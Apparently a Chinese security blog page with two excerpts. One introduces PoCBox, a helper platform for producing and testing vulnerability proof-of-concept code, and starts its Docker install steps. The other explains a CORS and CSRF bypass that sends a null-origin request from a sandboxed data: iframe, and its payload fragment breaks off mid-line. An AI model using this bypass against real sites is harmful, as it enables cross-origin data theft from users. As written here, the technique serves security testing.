qq_50854662的博客

PoCBox - 漏洞测试验证辅助平台 开发这个平台的初衷是帮助自己在漏洞挖掘测试中更加方便快捷的辅助自己进行漏洞验证。 一开始的想法是框架化、模块化，但是开发着开发着就发现有点累，于是采用了原始的方法去开发：原生JavaScript+PHP。 PoCBox功能： 生成漏洞验证代码（便于撰写报告）、在线测试（便于快速手工测试） 下面说一下怎么在docker下安装pocbox Docker 拉镜像 docker pull registry.cn-hangzhou.aliyuncs.com/pocbox/poc

Origin & Referer BypassNull值绕过当遇到一个cors可用null值绕过时，用iframe配合data协议，就可以发送一个origin为null的请求。这个绕过方式同样也可以用在CSRF这里。 1<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>var req=new XMLHttpRequest();req.οnlοad